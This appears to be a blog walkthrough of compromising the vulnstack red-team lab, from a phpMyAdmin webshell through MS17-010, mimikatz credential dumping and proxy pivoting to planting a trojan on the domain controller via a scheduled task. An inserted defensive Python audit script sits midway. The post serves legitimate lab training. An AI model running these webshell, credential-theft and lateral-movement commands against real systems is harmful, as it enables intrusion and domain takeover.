ATT&CK red team evaluation range (I)
2022-06-30 14:19:00 [Ff. cheng]
Preface
This was my first attempt at this penetration range; it took me three days. Other ranges will follow (it's great fun).
Range address: vulnstack
Range setup
Win7 password: cys121`
  Extranet 192.168.47.132
  Intranet 192.168.52.143
Win2008 password: cys121`
  Intranet 192.168.52.138
Win2003 password: cys121`
  Intranet 192.168.52.141
The three intranet machines can all ping each other.
Kali
  Extranet 192.168.47.129
Summary:
Kali (attacker): extranet 192.168.47.129
Win7 (VM1): extranet 192.168.47.132, intranet 192.168.52.143
Win2003 (VM2), domain member: 192.168.52.141
Win2008 (VM3), domain controller: 192.168.52.138
Start phpStudy on Win7:
Information gathering
Visit the Win7 PHP web service:
It is a PHP probe page.
Nmap
Scan for open ports: port 80 is open.
Yujian (御剑) directory scan
Scanning finds phpmyadmin.
dirsearch
It also finds some paths.
My scan here did not find /yxcms/.
Here you could also use a vulnerability in the yxcms site to log into its backend, edit a file and write a one-line webshell to get a shell; that route is not used here.
Exploit: getshell
Backend getshell
Go to /phpmyadmin
Login with the default account and password succeeds: root / root
Try INTO OUTFILE
Writing a one-line webshell this way fails:
select "<?php eval($_POST[shell]);?>" into outfile '/tmp/cyshack.php'
The reason is that file writing is not enabled.
Try enabling the global log
Use the general log to get a shell
show variables like '%general%';
You can see that the general log is off, and the path of the log file is echoed.
Try turning it on and changing the path:
set global general_log='on';
set global general_log_file='C:/phpStudy/www/cyshack.php';
Write the one-liner (the statement is recorded into the log file, which is now cyshack.php under the web root):
select "<?php eval($_POST[shell]);?>"
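As an added defensive counterpart (not part of the original post): a small audit that reads the rows returned by `show variables like '%general%'` and flags exactly the condition abused above, the general log enabled with its file pointing into a web root or carrying a server-executable extension. The sample rows, the web-root list and the `remediation()` helper are constructed for this example.

```python
import posixpath

# Constructed sample: (name, value) rows as returned by
# `SHOW VARIABLES LIKE '%general%'` after the change made above.
SAMPLE_ROWS = [
    ("general_log", "ON"),
    ("general_log_file", "C:/phpStudy/www/cyshack.php"),
]
# Constructed list of directories the web server serves files from.
SAMPLE_WEBROOTS = ["C:/phpStudy/www", "/var/www/html"]
EXECUTABLE_EXTS = {".php", ".phtml", ".asp", ".aspx", ".jsp"}

def _normalize(path):
    """Lower-case, forward-slash form so Windows and POSIX paths compare alike."""
    return path.replace("\\", "/").rstrip("/").lower()

def _under(path, root):
    """True when path is root itself or lies somewhere below it."""
    p, r = _normalize(path), _normalize(root)
    return p == r or p.startswith(r + "/")

def assess_general_log(rows, webroots):
    """Grade the general-log settings; returns enabled flag, log file, findings, risk."""
    settings = {name.lower(): value for name, value in rows}
    enabled = settings.get("general_log", "OFF").upper() == "ON"
    log_file = settings.get("general_log_file", "")
    findings = []
    if enabled:
        findings.append("general_log is ON: every statement, including attacker "
                        "input, is written verbatim to the log file")
    in_webroot = any(_under(log_file, root) for root in webroots)
    if in_webroot:
        findings.append("general_log_file lies inside a web root: " + log_file)
    ext = posixpath.splitext(_normalize(log_file))[1]
    executable = ext in EXECUTABLE_EXTS
    if executable:
        findings.append("general_log_file has a server-executable extension: " + ext)
    # High when the log is on AND the file is served or executable: that is the getshell above.
    if enabled and (in_webroot or executable):
        risk = "high"
    elif enabled or in_webroot or executable:
        risk = "medium"
    else:
        risk = "low"
    return {"enabled": enabled, "log_file": log_file, "findings": findings, "risk": risk}

def remediation():
    """Statements a DBA runs to close the hole: log off, file moved outside the web root."""
    return ["SET GLOBAL general_log = 'OFF';",
            "SET GLOBAL general_log_file = '<path outside the web root>';"]
```

Run against the sample rows it reports risk "high" with three findings; the same check belongs in a scheduled configuration audit alongside secure_file_priv, the variable that governs INTO OUTFILE.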
Connect with AntSword:
getshell succeeded:
Using AntSword
Check the identity in AntSword:
Add a user:
net user cys [email protected] /add
(adds a user named cys with the password [email protected])
View the cys user:
Turn off the firewall:
netsh advfirewall set allprofiles state off
Control Win7
Getting access
There are two ways:
A Trojan that calls back a shell
SMB ms17_010
Create the Trojan with msfvenom
Upload the Trojan with AntSword
Run the Trojan:
Just set up a listener in Kali
Try ms17_010:
The attack takes control of Win7:
Privilege escalation
sysinfo
getuid (found to be administrator)
getsystem (obtain SYSTEM)
Principle of the msf getsystem command
Host password collection
hashdump: view the users' password hashes
Mimikatz: grab plaintext passwords
PS: the mimikatz module has been merged into the kiwi module
Metasploit: advanced user password collection with the mimikatz and kiwi modules
load kiwi:
creds_all
This command gets the passwords directly:
Remote Desktop connection
Nmap showed 3389 was not open
Try enabling 3389 from meterpreter:
run post/windows/manage/enable_rdp
Try remote login:
rdesktop -g 1440x900 -r disk:LinuxxDisk=/root/Downloads -u STU1 -p "password" 192.168.47.132
Intranet collection
ipconfig shows another IP:
It should be an intranet segment
Use ipconfig /all
to view the DNS server:
The DNS server name is found to be god.org
View domain information: net view
View primary domain information: net view /domain
There are many collection methods online; not repeated here
Add a route and set up a socks4a proxy
Before lateral movement, the web server is first configured as a proxy server to act as the pivot.
Add a route
View the route information and add a route to the target environment's network
The purpose is
to let MSF forward traffic through Win7, so that msf commands can reach the intranet through Win7
run get_local_subnets // use this command to view the target machine's intranet-side and public-side subnets
Add the intranet route
so that msf6 can reach the 192.168.52.0/24 segment through Win7's route forwarding
run autoroute -s 192.168.52.0/24
This way we can enter the .52 segment through msf
Now scan the .52 segment:
run post/windows/gather/arp_scanner RHOSTS=192.168.52.0/24
Scan for live hosts:
use auxiliary/scanner/netbios/nbname
Intranet port information:
use auxiliary/scanner/portscan/tcp
Set up the socks4a proxy
Set up the proxy so that other tools
can reach the 192.168.52.0/24 segment through Win7
Configure the msf proxy:
use auxiliary/server/socks_proxy
After run, "starting..." appears;
jobs
shows the current proxy job. If "stopping..." appears,
try changing SRVHOST
in the configuration, or modify the following configuration file
If proxychains has problems, configure the terminal proxy by modifying the file
/etc/proxychains.conf
After the proxy is set up, prefix other tools with proxychains:
Nmap scan of 192.168.52.141
proxychains nmap -Pn -sT 192.168.52.141 // -Pn and -sT are required: a SOCKS proxy only carries full TCP connections, not ICMP pings or raw SYN packets
Penetrating Win2003 (remote login)
Information gathering
Scan the host version
use auxiliary/scanner/smb/smb_version
Scanning 192.168.52.141 shows the system version is Win2003
nmap port scan, etc.
Attempt the attack
nmap shows port 445 is open
Try the Eternal Blue attack against Win2003
use exploit/windows/smb/ms17_010_psexec // the attack module for Windows 2003
set payload windows/meterpreter/bind_tcp
You can see that access is obtained, but the Win7 session drops immediately
Try again:
Still the same (the Win7 session keeps dropping, and I have to regain it each time)
After regaining Win7, be sure to check the privileges first:
getuid
getsystem
(shell) netsh advfirewall set allprofiles state off // turn off the firewall
One more time: it works, but other commands cannot be executed
Try ms08-067
It did not work
It is possible to execute some commands with SYSTEM privileges,
so add an administrator user and try a 3389 login
Because port 445 is open, use:
use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.141
set command net user cyshack @[email protected] /add # add the user
run # executed successfully
set command net localgroup administrators cyshack /add # administrator rights
run # executed successfully
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' // enable port 3389
run # executed successfully
SYSTEM-privilege command:
cyshack user:
3389:
Then use proxychains to connect to its 3389 (log in as cyshack)
proxychains rdesktop 192.168.52.141
Pivoting to Win2008 (transfer via the C$ share)
Information gathering
Scan version information:
use auxiliary/scanner/smb/smb_version
Nmap: 135 and 445 are open, 3389 is not
Eternal Blue and the port 135 vulnerabilities all failed; give up on the exploits
Using the command module, users can be added:
use auxiliary/admin/smb/ms17_010_command
Find another route
Get the passwords of domain users from Win7:
kiwi_cmd sekurlsa::logonpasswords
Here Win7 is used to send an msf payload to the domain controller, and the payload on the DC is started by a scheduled task
Then we only need to set up a listener on Kali
Generate the payload: (set the reverse shell to Win7's port 9999)
First connect Win7 to the domain controller's C$ share
(shell) net use \\192.168.52.138\c$ "cys121`" /user:"administrator"
View the domain controller's C drive:
(shell) dir \\192.168.52.138\c$
This shows it succeeded
Upload the msf payload to Win7:
(win7 meterpreter) upload
Copy Win7's payload to the domain controller's share:
(shell) copy c:\Windows\System32\cyshoumen.exe \\192.168.52.138\c$
View on the domain controller:
Create a scheduled task to start the Trojan at a set time:
schtasks /create /tn "test" /tr C:\cyshoumen.exe /sc once /st 22:14 /S 192.168.52.138 /RU System /u administrator /p "cys121`"
Set up the listener: at this point you should listen on Win7's port 9999
After the scheduled time the shell calls back:
Taken down
References